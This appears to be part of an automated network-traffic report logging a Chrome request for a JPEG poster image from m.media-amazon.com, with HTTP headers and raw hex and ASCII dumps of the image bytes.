                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 c2 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 08 04 05 06 07 01 02 03 09 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 d0 e3 c4 f6 40 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5@
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: eb 5e 5b 14 64 a5 e9 7a 45 cd 67 9e 94 1b 67 5b e6 5c 9b 59 ec fd 2f bc fd 56 6a 5c ee eb 9e ba f2 b3 35 f1 85 8a df 96 f0 63 37 5a 9f 3b d6 f9 5b 82 35 a5 2e 91 df 18 b4 35 82 a2 9e 97 08 00 00 00 00 02 9e a1 68 e2 46 c6 ff 00 a8 9d dc 3f 34 f6 46 cb c2 39 3b 3a 74 f6 ac e6 e9 a9 a9 b6 5e e8 f7 a8 e7 de 93 6c ad 7b 1e 3e 95 76 fb 57 cb 9a 9e 6d 16 7a 3b e7 29 b3 d0 5d fa 69 9d a3 54 ef 1a 39 47 55 e6 cd 68 08 00 00 00 00 ce 30 7f a0 9d 3c fa 02 4f 60 94 9d fc 1c 69 6b ae 01 c5 dd 9d 55 e8 ce dc 1d db fe ae 3e f6 84 8b ac 8d be 50 92 1c c6 fa 94 48 54 7e 4a 40 f1 a0 fb da bb c1 a3 f9 37 6f 7d 1e 4e db f2 d4 bd 26 32 fd 33 9b e0 f6 8e c1 00 00 00 00 36 fe a0 5e 92 27 6e c1 9e dd 3c f2 de 25 f9 31 d8 31 d4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii: ^[dzEgg[\Y/Vj\5c7Z;[5.5hF?4F9;:t^l{>vWmz;)]iT9GUh0<O`ikU>PHT~J@7o}N&236^'n<%11
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 37 e3 2b 07 b1 f7 75 9b 92 4a 32 37 6f 31 77 fd c2 29 8d c2 18 f3 c1 9b 7f 67 34 63 04 81 b4 ee 91 9c cc 60 8c 7b bc 77 4d ae e0 bc 0e f9 ca 3d f8 16 87 79 5f b9 5f d9 92 5c fe 1f 3e ed ac 2e f0 01 fe 58 40 e5 13 82 b2 81 5b 90 c9 52 49 cb 44 ee 24 9f 77 5f 3b 90 94 1c ae ff 00 21 19 43 81 c1 ec 5e 00 27 1e ed bf db 43 07 61 e7 ba 76 7b 6d 0d 6f ec c0 e4 41 23 69 44 15 33 8e 36 1f 7b 03 1a 7b f0 13 b0 a2 10 18 43 3c 1c 70 9c ed c7 3e f9 92 16 67 10 cb e7 74 ed de ed a1 12 8f 83 82 31 92 04 80 b4 b8 38 ee 24 ff 00 a0 6b 8b 3c 37 32 e0 33 9e ec e4 98 cb 79 6f 97 b4 a0 e1 c3 04 8f f4 4d 71 61 0e 1d 37 55 24 72 0d 46 5e 64 ef 59 f7 ed 69 77 e1 cf c9 a5 bb 63 09 5e 7c fb ea 5a 5b 63 c7 30 4e 1d d8 3d 8c 97 76 fb 1a 07 fe 91 fd 28 0e da b2 1f 91 d3 34 21 23 48
                                                                                                                                                                                          Data Ascii: 7+uJ27o1w)g4c`{wM=y__\>.X@[RID$w_;!C^'Cav{moA#iD36{{C<p>gt18$k<723yoMqa7U$rF^dYiwc^|Z[c0N=v(4!#H
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: a1 84 d2 3a 3f dd d1 19 0c 0c f1 aa 10 14 aa 3c 68 5f 9d 85 2a 08 94 e6 5c fa 88 e8 90 4b 2d 10 07 e5 51 9d a3 19 bb f0 83 eb 0d e9 8c 6a 47 52 4c f3 1d ea 28 7d 9b a9 12 ca 54 f5 31 83 81 d4 fc 6d ee 69 fb f7 34 e6 a6 b8 59 08 d5 3a 82 04 0a de e7 f9 66 8f 51 62 a5 68 75 4e 39 4b e2 24 2e cf d4 b6 52 a0 75 00 11 54 4f 74 b2 e3 5f f3 31 40 67 c6 2b 1f 36 40 04 93 33 0e 6b bf 96 2a 55 f5 c8 5e f1 d2 95 d5 46 68 38 61 f2 e4 8f 0f 29 50 2b 20 73 5a b6 06 35 63 c5 0d b6 0a b8 03 81 f2 ba 29 19 3a ec da d7 68 1c e0 8c 28 14 90 e4 82 3e 63 92 a4 05 b6 1b 15 70 cc 7f 10 10 35 46 a5 43 03 f3 e6 b5 40 29 90 31 06 b3 f3 47 6c d2 1e 3d b9 7f 4f 6e 53 cb 2e 46 28 9a 58 99 ce 15 6d 25 63 80 f6 72 20 c9 f8 e3 40 a8 00 2d 53 c4 ed c8 cf 8f a4 37 0e a3 54 57 24 f3 52 a0
                                                                                                                                                                                          Data Ascii: :?<h_*\K-QjGRL(}T1mi4Y:fQbhuN9K$.RuTOt_1@g+6@3k*U^Fh8a)P+ sZ5c):h(>cp5FC@)1Gl=OnS.F(Xm%cr @-S7TW$R
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 19 fd 16 b2 18 ba a6 b0 4d d6 e8 e1 06 c3 26 02 95 70 6b ee 58 22 2f 22 38 7f ca 84 20 09 a2 c5 f8 d7 3b a1 db 46 e3 b9 49 c2 eb 0a 34 26 8c 2b a6 18 39 e1 13 1d db d3 30 ae 66 31 c5 c1 c1 d0 56 55 d5 cf c7 85 4d 90 40 07 3f ed 03 b3 c0 18 70 53 18 f0 30 9b 20 60 ab 8f 08 a6 b4 b1 c5 c2 89 8b 14 f0 5e d6 6f 81 e6 80 fe a8 c5 76 fe 33 d4 86 3d db 19 d9 85 5d 69 ee de 47 7a 2f ed ee 5c 91 8d ca 3a a1 c4 2a 1c f8 37 5c 91 76 1b 30 5a 07 86 7f 54 cc 36 8b be 4f f9 60 f3 4e 06 e6 63 80 04 a1 28 20 0d c3 1f 2a 14 54 8c 4d c5 ef 91 94 5a 4c 91 8b da e7 17 42 a8 83 cd 60 dc de d2 ec 3b 5c d1 58 3d 41 5a 78 14 e0 d6 35 cf 22 73 75 30 58 4d fb 77 bd f8 93 ea 45 19 1b 9c 63 fe 3c f0 a0 b2 1a 77 55 0e ab ee c6 1a 0c 2f b8 e0 f9 63 2d 94 76 5c 4e 92 4f 68 ef bd 93 85
                                                                                                                                                                                          Data Ascii: M&pkX"/"8 ;FI4&+90f1VUM@?pS0 `^ov3=]iGz/\:*7\v0ZT6O`Nc( *TMZLB`;\X=AZx5"su0XMwEc<wU/c-v\NOh
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 21 10 2b 6d 5d 97 9c 10 28 26 59 91 8c 00 11 5c 7b 15 0b 9f a7 63 c5 79 9b c2 a8 fb 23 3d dd c4 c1 b3 8e 86 88 ef 59 25 18 44 53 62 81 84 23 73 8c c4 6c 57 38 69 80 42 20 79 4c 60 8c 20 a8 64 e4 ae 82 26 15 3a 59 a8 a9 5d 61 a0 47 92 39 24 8d 92 bd 5a cd c7 a3 7c 4a de c3 69 84 8c ad d9 c5 11 0b 05 5d c7 3a c8 ba 1d 87 dd 18 1b 69 82 db 59 36 9b e2 47 05 d0 b2 31 1e 9b d5 6e e1 8d c5 7b a6 c7 4c 5c 36 9a 77 41 7c 23 3d 16 43 65 fe 11 42 7a 23 b5 5c fd 3a d2 a7 2f e5 ac 5e d8 9b 32 65 22 e9 59 0a f4 c9 5c 70 45 6e 7e 28 1a ac 1a d1 8f 56 77 3a c4 f4 89 1e c1 c9 80 88 ac aa a3 bd 75 1e b7 a8 ed 52 f7 53 d4 9b b4 29 fa 6a 5d 75 ad 43 e2 ff 00 a9 51 dd 11 fc 84 14 09 fd f3 8e d9 a6 35 99 c4 fd 04 35 85 8c e7 50 6a 86 9c fc ac 52 b9 fe d9 8d 67 e9 dd 03 84 29
                                                                                                                                                                                          Data Ascii: !+m](&Y\{cy#=Y%DSb#slW8iB yL` d&:Y]aG9$Z|Ji]:iY6G1n{L\6wA|#=CeBz#\:/^2e"Y\pEn~(Vw:uRS)j]uCQ55PjRg)
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 54 2d 21 cd ac 6e f7 ef 4b 73 4f 81 51 45 c1 8f b4 46 78 a8 2d d8 f9 df 62 97 8f 9f be 94 97 9a 2f 74 fc 94 7b 3a fb 1d eb 99 4f 9a 23 4f ec 95 89 12 7f 83 d8 53 25 ae ec da 76 2d 50 52 7c d6 93 a9 27 7a ec 25 3d 81 fe 20 3f 2c 5f 2f 16 a6 f1 b7 c5 07 c0 49 40 a0 5d 50 05 d5 74 0d 5f 41 04 5c 8e 2a ce bd 0b c3 21 7e c7 b4 14 5b 32 c2 d4 9d ce ea 84 f4 dd ca 7d 85 08 98 24 08 27 a3 58 5a 2d 6d c7 03 96 c5 34 5a fe ee 3c 11 05 3b ab 76 1f d3 5e 4b e1 a2 1a 06 c4 29 45 f4 a6 ea c5 04 33 da 3d 25 1f fa ca 03 41 57 01 70 93 5d 0e d5 05 9a f4 ec 98 92 d3 0e ad ab 11 6a f5 2a 61 6f 20 0b d5 d6 a1 63 22 92 15 37 5e e0 0d b7 9e 95 00 b3 5d 32 f1 34 a6 d7 57 00 39 ef 6e f5 63 67 1e d5 88 d0 67 48 1e cf 44 79 ee 2f 06 a2 1f 3e d1 a9 f1 7f 05 9f 79 3b 56 8a ad d2 18
                                                                                                                                                                                          Data Ascii: T-!nKsOQEFx-b/t{:O#OS%v-PR|'z%= ?,_/I@]Pt_A\*!~[2}$'XZ-m4Z<;v^K)E3=%AWp]j*ao c"7^]24W9ncggHDy/>y;V
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: c6 d6 c2 8e 21 6c e8 c6 c6 04 25 5d 08 bc 59 ce 32 c2 f7 99 d3 d4 bd e7 da 7e 7d 79 cd 2f ab 12 b4 e6 33 6a 73 24 cc b3 86 17 b7 5a b1 a9 89 11 91 1b 4f b7 a2 21 34 ae 4c fe 30 fe d5 df 81 53 07 65 59 86 48 4b 5c 73 da b4 fd 06 19 de da 4b 82 13 8d fd 32 21 c4 a4 24 85 92 d2 38 a2 4b 7a a0 16 4f 52 fd bd 23 77 de 1f af 50 98 0d 74 ca cd 45 44 19 0c 1d 53 8e 55 6c 0c c5 bc 54 e5 78 d7 64 43 f9 7a fc ef c7 f1 81 e6 4c 02 dd f1 87 41 ba 87 1b 2d 36 b7 c9 1d f7 1d b6 45 23 60 86 cb 99 ac 4c da 99 4c 60 f5 83 31 2b a9 cf 9c f7 f4 b6 1d 6e f3 f5 04 f7 c1 b1 b6 e8 c0 e3 0b 50 c4 ac b6 62 67 67 45 c9 50 4b 74 fb 07 e2 8b 22 64 24 ea 36 a2 d0 02 96 0e 8f 17 bb e8 fe 63 bf f1 91 dd 1b fb dc 75 2a 1d de 9e 72 9b f6 ec a3 b9 53 30 01 ba 44 6e 5b e3 49 a5 02 82 f0 65
                                                                                                                                                                                          Data Ascii: !l%]Y2~}y/3js$ZO!4L0SeYHK\sK2!$8KzOR#wPtEDSUlTxdCzLA-6E#`LL`1+nPbggEPKt"d$6cu*rS0Dn[Ie
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: a8 9b c7 24 5a c2 30 36 a8 92 cd 8d 9c 7e 0e 3f 82 88 9b f4 e1 c5 0c 16 70 e0 5a 86 5b 3b 71 9a 06 d1 63 b6 91 ad 6e f5 5e f9 ea 99 ec b5 3a 18 b1 91 1d f2 3d 30 73 13 48 72 e8 4b 7f 2f de b4 44 93 1b 1b f7 fa 72 a4 00 10 78 3c 54 31 16 66 91 a3 c1 7f 98 fd 52 5d fa 5a 7b 90 54 12 2f b4 b2 fe fe 2b 9f e3 ce d4 dd 66 e3 08 c7 2c f3 52 83 c5 19 f9 78 8a 0d af 9e 2a e3 39 fc 79 f1 50 44 6f a3 7c d1 1f 8e fd f3 8f 12 e6 90 4e 0c b3 35 f2 8c f2 37 eb 48 b2 5d 73 3b a2 e7 16 c9 18 a2 87 53 84 70 9f 73 44 d9 65 64 e6 31 0f 38 3f ef 34 4e 75 c6 60 c4 75 18 78 a4 2a 5e 2b 78 43 a3 4c c8 71 8b 8d 7d ce 95 5d cb 37 c5 f7 a4 b0 3a d7 9a 30 68 6c 69 d7 c6 d5 9a 7e f5 a2 6d b5 ef f7 ef 15 11 8e 9b 77 fa fc d3 2c cf e5 e2 fe f4 10 d1 3b 5a 7a d0 f4 a1 75 f1 59 4f c1 fb
                                                                                                                                                                                          Data Ascii: $Z06~?pZ[;qcn^:=0sHrK/Drx<T1fR]Z{T/+f,Rx*9yPDo|N57H]s;SpsDed18?4Nu`ux*^+xCLq}]7:0hli~mw,;ZzuYO
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: a5 53 ca 9c 7d 65 9c f2 cf 66 30 db 63 45 4e 3b ba 06 65 32 d2 ee 52 52 66 e6 de bb 5c 52 55 28 f8 fe 6a c6 43 8f 87 0b 9a a1 03 f7 83 8f d4 e7 97 6f f0 ce fc 21 84 07 9f e5 f9 af 3a 39 f9 4c 22 d7 f9 8a ae 2f e9 df d5 fe a7 0d 26 00 c5 5d 8f b2 6e 57 cb 3f 87 22 07 fa 46 d8 04 fd a1 73 5f 2f 5d d7 61 3e 53 c0 8d 44 19 d3 00 55 1d 00 2b 95 7e 9c d4 0a 3e 05 c2 7b 99 b1 c2 7e 78 3f a9 e1 60 7a 48 f8 3d d6 e0 fa f1 f3 46 63 11 e8 42 a0 20 80 94 17 0c ed 21 38 74 18 7b f2 c0 62 22 fc 6e a5 aa 08 ca be af ec c9 25 7f f5 8c 58 7f cc 5c 03 4a 58 a1 44 0e 31 7e 56 6a f2 9f a7 d7 bf 10 03 d4 d2 c1 b5 cc 0e 4e 28 63 40 2e 2a f9 3e fd 81 08 77 c1 3f 14 b3 e5 ad f7 ba 01 c2 4b a5 cf e3 11 e0 d6 f7 8c b7 a3 e3 9b b7 c0 b7 0b 45 ad 36 6f de 02 8f 9e 37 64 65 c4 3d 43
                                                                                                                                                                                          Data Ascii: S}ef0cEN;e2RRf\RU(jCo!:9L"/&]nW?"Fs_/]a>SDU+~>{~x?`zH=FcB !8t{b"n%X\JXD1~VjN(c@.*>w?KE6o7de=C


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          89192.168.2.1649823151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:10 UTC445OUTGET /images/M/MV5BOTMxNDVmNTQtNWQ5My00MjE0LWE2MzAtOTVlNzg5OWFmOTQ4XkEyXkFqcGdeQXVyMTQ3Njg3MQ@@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:11 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 27912
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: d8e7937c-16df-4cc4-a205-db08a3c43e61
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Thu, 27 Jul 2017 05:03:13 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Tue, 08 Nov 2044 07:21:09 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 1526913
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:11 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000109-IAD, cache-ewr-kewr1740043-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 93 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 07 08 00 01 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 00 03 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 a0 5e ab a7 2c 1e 86 e4 83 39 d6 59
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"6^,9Y
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 98 ff 00 5d f2 a3 13 f3 21 8f 6c 73 b6 44 12 47 06 b8 b1 2a de cb a8 69 ba 19 a2 28 59 5d ab 1e 97 4d 29 a8 92 2a 92 ce 69 c1 d7 39 4f 83 e2 fa ff 00 06 4f b4 5c 03 90 b9 f4 b8 b6 cb e4 31 87 b5 e4 6c b3 9a 96 91 91 6f 3c fb 2b 92 c5 d1 74 b5 d7 9b a4 85 6b 39 fb 39 2e 6a 91 3a 19 09 73 31 0c 2e 64 1e 59 10 ba ee f0 e5 7a 95 c2 c7 3c c4 73 86 53 0d 69 12 fa d5 19 05 7d 2c 1d 56 67 08 ce 80 62 25 da c5 26 7a a7 2e b6 5e 79 1f 91 ea c9 9d 53 0e 9d 8f 2d f4 45 1e 67 8e 8a af 44 f4 1d ed 1e e8 a7 ea ed 18 6b 61 9b d6 2f 20 e5 78 1c 9e c6 b5 16 6b 1c 39 b7 96 c8 f3 51 b1 e5 d3 2f 94 d2 37 21 8d 90 3e 73 52 e4 a6 af 20 6d b8 d8 6b f7 16 59 7a d8 47 aa 67 47 51 b2 78 b6 7e 54 d0 19 70 e6 d0 6f cd 3e 4c b5 ec a2 cf 62 7a dd dd d8 65 a2 38 54 d6 99 06 7c eb 47 b1
                                                                                                                                                                                          Data Ascii: ]!lsDG*i(Y]M)*i9OO\1lo<+tk99.j:s1.dYz<sSi},Vgb%&z.^yS-EgDka/ xk9Q/7!>sR mkYzGgGQx~Tpo>Lbze8T|G
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: c2 00 03 c1 09 2a 09 3c c2 8b 3c b7 1e 69 bc d1 c4 69 77 cc a0 64 9a 77 2f 8c 6d 0d 07 72 45 6d dd ca ce 4c fd cb 3d 53 dc 09 80 ee 84 80 f7 2b 77 9d c4 13 e7 71 af d3 3b a1 38 7d d1 90 1d dc 01 5d dc 41 4a 7b 98 78 57 74 22 1f 74 87 11 dd 68 01 9d cc be 1f dc 47 2c ee 8d ff c4 00 2f 10 00 02 02 02 01 03 03 03 04 02 03 00 03 00 00 00 01 02 00 03 04 11 12 05 13 21 10 14 31 20 22 32 06 23 30 33 15 41 24 42 51 34 43 71 ff da 00 08 01 01 00 01 08 02 39 f2 bc c0 fe 0c bf 33 b6 74 29 cd e6 c1 4d c7 82 93 3d eb c4 ce 6f f6 a7 90 06 5d 99 c7 c2 8c d6 89 7f 35 d8 a9 b9 ae e7 bb 6e 5a f4 bb 29 95 88 99 37 b2 11 ac 6b fb 83 ce 55 ad 5f 1d 52 c5 94 19 95 73 21 1a c7 bb 98 8e dc 41 31 2e 72 c2 64 5c ca da 17 5a c0 2c a1 8b 2e ce 45 a5 5a 23 7d bb 36 64 16 3e 05 8c b2
                                                                                                                                                                                          Data Ascii: *<<iiwdw/mrEmL=S+wq;8}]AJ{xWt"thG,/!1 "2#03A$BQ4Cq93t)M=o]5nZ)7kU_Rs!A1.rd\Z,.EZ#}6d>
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 38 54 b3 3e 81 7d 4c 86 da 8d 6c 54 e3 0f b8 4a 54 01 e3 52 c8 ab ca 75 3a be dd cc 7a bb 87 ce 30 75 3c 4f 51 bf 87 93 d2 3f f9 15 cc c0 71 ef 25 2d ea 05 d7 8f a3 fc 18 08 e2 bb c9 b3 4c c2 1f 81 2b b4 d4 76 b3 8b 38 e2 aa 78 aa ab 5d c1 cb 95 c4 da 5b 53 06 7d 64 5c 22 64 ab 1e d9 a0 3d 17 f6 db a8 71 56 47 51 eb f1 2c b2 26 3b de 0b 2f 1e 30 2f 22 04 03 5e 23 ca 71 10 96 25 ba 6b 62 6f 56 e4 64 0d c4 c9 c8 6f 8f 71 71 3a 98 c8 78 f9 ba ae e0 d1 a7 1d 68 de 8b 72 f2 7a 85 fd e7 9d 0c f1 c9 5d f5 5a f6 8a fe b6 02 41 98 ee b6 a0 23 28 87 66 f5 c6 c2 36 fc d3 88 10 cc de 9f c8 6d 6d a0 d6 4c a3 23 83 a1 39 19 1c ef 67 4b b9 0f be 2b 9c 9a 12 d9 9e fd c3 c2 2d 83 53 70 18 f6 ea 7b 66 b0 6c d2 be df 5c 7f c9 ef e6 9a a9 b5 d5 92 38 94 89 75 41 d4 82 2a 0c
                                                                                                                                                                                          Data Ascii: 8T>}LlTJTRu:z0u<OQ?q%-L+v8x][S}d\"d=qVGQ,&;/0/"^#q%kboVdoqq:xhrz]ZA#(f6mmL#9gK+-Sp{fl\8uA*
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 2e 2c ec 9a b2 72 bb 94 b2 be 78 1c 69 33 3f 55 db 49 98 87 bb 71 b1 72 f5 65 b6 4b 6d ef 62 83 32 1b f6 a2 da 40 10 af fe a9 13 aa 50 e4 87 1d 26 93 52 3f 20 bc 7c cc 75 e3 cc c6 fb 80 97 60 55 fb b7 4b 1b 93 13 e9 cc 35 5c 22 d2 5c 85 1d 5f a6 0c 7a 6a 65 e9 f4 77 ed 08 33 f3 17 da 2d 2d d2 2f 2d 8f 2e 62 5b cd 7e 44 cd c6 51 4d 85 b0 16 b5 ae ab 17 0e be eb 58 f1 4e c0 99 47 88 52 79 f2 68 8f c1 09 94 b7 31 ca 75 0c 6e fd 7e 28 cd b3 80 51 67 71 6e ee 4b 3b 97 9a 89 ce c1 f7 03 63 2e 86 74 a7 59 74 33 db 49 14 d1 66 3d 8e 06 3e 08 3b 36 fb 7b 11 6c 49 77 7b 81 0c aa da 9b d9 f3 ca 63 be a5 df 7b f3 5f c8 4b 3e c4 89 e0 43 f6 1d ce a7 d2 05 df bb 48 4f 99 d2 b1 56 e7 2d 6f 4f c5 af 19 8d e7 a9 dd df a1 d5 3a 5d 5c 32 ab e7 71 2f 63 4e 94 fc 14 89 91 e0
                                                                                                                                                                                          Data Ascii: .,rxi3?UIqreKmb2@P&R? |u`UK5\"\_zjew3--/-.b[~DQMXNGRyh1un~(QgqnK;c.tYt3If=>;6{lIw{c{_K>CHOV-oO:]\2q/cN
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: f0 ff 00 e5 6b b0 7e d9 ca 5a c8 e4 6d f1 e3 89 6f 90 a1 62 a0 32 fa 40 8c bc 0c ee 08 7f 83 a2 ba 26 4d 65 d0 9a f3 4f 7b 2d f8 2e 32 dd 9f 93 dc af 39 0f f0 03 af 87 b0 b1 04 df 98 f6 ce 50 3e a5 97 9b 00 10 e5 12 ba f4 1b 3e 05 58 0e de 4d 38 69 57 c7 18 12 14 80 4b 06 e6 55 7e 26 a1 3e a7 d3 7e aa 37 e0 7d cd 0a 31 9d b6 8c 8c 3e 78 1d 6e 05 27 e3 8f fa 9a 85 48 f9 51 bf 8d 6b e4 a1 10 0d ce 26 6a 6a 7c 7a e0 b8 13 be a2 53 92 4f c6 c9 81 e7 2d cd ce 53 2c 80 a6 6f d4 fd 5d 0d f8 65 55 1a b1 8c bd 42 c9 7e 47 b7 b3 10 0c fe a8 71 f2 92 a9 9f ff 00 23 22 ac 56 1d 4d 0e 4f b4 98 94 fb 3f 79 c2 c5 16 36 1d 8e 31 ab 17 e4 e4 3d 39 35 f5 9a 6e 53 fa 70 7f ca 99 9c 33 71 ec b2 75 fe 7e dd f5 fa 61 93 b9 60 6a 0d 87 3f f7 71 82 62 51 7e 4c e9 57 0b db 2b 31
                                                                                                                                                                                          Data Ascii: k~Zmob2@&MeO{-.29P>>XM8iWKU~&>~7}1>xn'HQk&jj|zSO-S,o]eUB~Gq#"VMO?y61=95nSp3qu~a`j?qbQ~LW+1
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 3d 40 ea 0d 84 a9 fa d3 17 48 53 50 6c 96 68 cd 95 94 6a 74 26 9a d8 47 4b 57 8c 87 b1 79 6b 32 fd 3b 13 b8 9e a9 7b 0c 1f cb b4 a9 ae 2e a6 f4 50 8a d6 ea 19 c3 9e 5b d5 b9 63 5d a8 b4 7d d5 2c 0d f5 6d 46 a5 c6 d3 9b 98 04 26 d7 c6 c3 cc e5 42 44 66 f4 b5 f4 a0 42 92 28 c0 c4 09 9f db 8c 42 0e 3c eb 1c 0b 70 a2 d6 9f 89 a5 3e 43 55 45 6c ac 8b d4 f4 c4 9c ff 00 a7 a6 1e af d6 d2 d5 b6 da ba 85 00 82 47 56 d3 ee c4 ff 00 4e 81 99 fe ad 1e 8d b6 07 72 c0 4d 2e 98 bd 8b 11 40 1d 8c 55 ff 00 dc 0c 62 75 0d 07 9e 45 02 19 8c ca ba 6d d6 fe a7 a4 ea 00 cc 7a 2c 4f 78 ec 33 15 49 32 be 97 6b c4 e9 2a 3c bd 1a 65 5f d4 2e 06 61 b4 62 07 dd 07 6b ea 0c 08 37 55 c7 61 58 94 b3 b0 51 a6 e8 6a 98 7b 02 28 c4 6a 57 11 f4 e8 c3 ed ab e9 26 b2 5d 36 ca 3a 7b da c0 0a
                                                                                                                                                                                          Data Ascii: =@HSPlhjt&GKWyk2;{.P[c]},mF&BDfB(B<p>CUElGVNrM.@UbuEmz,Ox3I2k*<e_.abk7UaXQj{(jW&]6:{
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: fe 12 e9 c2 50 f4 ed d6 c1 ab 78 4a 42 88 da ff 00 99 3b d1 6d 6e dc 9d b6 dd 49 ad 9a c0 e7 75 ab 69 1a 8d 70 3f 35 2e 5e de df fb 8c fd 91 60 a1 2e e2 97 61 7c 7c 50 f9 e8 c5 14 72 32 7a 8e d6 1f 99 fd 60 cd b1 15 de 42 49 b6 64 de cd 71 3f 84 13 b4 4e 24 5b 6b cf 73 6b 1c 95 24 c9 12 17 7b ff 00 55 c9 26 e2 85 ae 1c f9 65 98 fd 47 7f 34 6d fa 63 7d 42 97 0b da 94 0f f9 73 95 8a d5 0b 3d d7 a8 66 bb fd 68 1d fc 00 49 d0 9d 4a b9 05 4f 9a 04 fd bc 5a 1b ad 1a ed 1d 6e b1 78 b8 6e 6d ee 0c 98 27 2f 66 63 ac ee 41 d1 52 05 79 35 ba e7 b1 aa e3 a0 2b 89 f9 a4 77 52 ac 96 9e a3 b8 84 b8 69 ae de 77 2f 26 ea 24 e4 c1 6a d3 0f 67 6d 09 9a a7 9b bb 33 b9 58 bf 6a 2f e6 b8 ed 74 5a 20 4f 86 f0 ba ac 2d c2 ad cf 66 4b 5c 54 16 80 88 b3 f0 a8 ed 49 4e bb 6a 4b 7f
                                                                                                                                                                                          Data Ascii: PxJB;mnIuip?5.^`.a||Pr2z`BIdq?N$[ksk${U&eG4mc}Bs=fhIJOZnxnm'/fcARy5+wRiw/&$jgm3Xj/tZ O-fK\TINjK
